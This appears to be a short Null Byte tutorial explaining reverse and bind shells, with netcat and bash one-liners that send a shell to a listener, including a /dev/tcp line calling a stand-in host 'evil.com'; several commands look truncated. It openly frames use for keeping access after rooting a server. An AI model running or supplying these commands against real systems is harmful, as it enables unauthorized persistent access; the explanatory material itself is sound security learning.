Reverse shells are useful for issuing commands to a remote client when the client is behind something such as a NAT. You might say, "But can't a normal shell or simple SSH tunnel do the same thing?". No, it can't. All over the internet I see a lot of confusion regarding the difference between a normal shell and a reverse shell. Let's clear this up before we get started.
Reverse Shell
- A reverse shell works by the remote computer sending its shell to a specific user, rather than binding it to a port, which would be unreachable in many circumstances. This allows root commands over the remote server.
Bind Shell
- A bind shell is when a user uses BASH and binds a shell to a local port that anyone can issue commands to on the local network.
Reverse shells are also commonly used for nefarious purposes, like after a hacker roots a server, they will likely make a reverse shell so they have easy access to the computer for future use. Let's take a look at a few ways we could make one on an example remote computer. I trust it is one that you haven't used.
Requirements
- Remote Unix host
- netcat installed from your package repository
Reverse Shell Interaction with NetCat
When shelled in to the remote host, simply issue the following command to send the shell back home:
nc -c /bin/sh
You could even pipe BASH through netcat.
/bin/sh | nc
Then listen for the shell:
nc -l -p
Reverse Shell with BASH
This technique is for when netcat isn't available on the remote machine and when you want to leave a small footprint when you're doing things of a questionable nature.
Listen for the shell:
nc -l -p
Now create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.
exec 5<>/dev/tcp/evil.com/
Or another reverse shell:
0<&196;exec 196<>/dev/tcp/
Then, simply send raw commands through netcat.
Be a Part of Null Byte!
Comments
No Comments Exist
Be the first, drop a comment!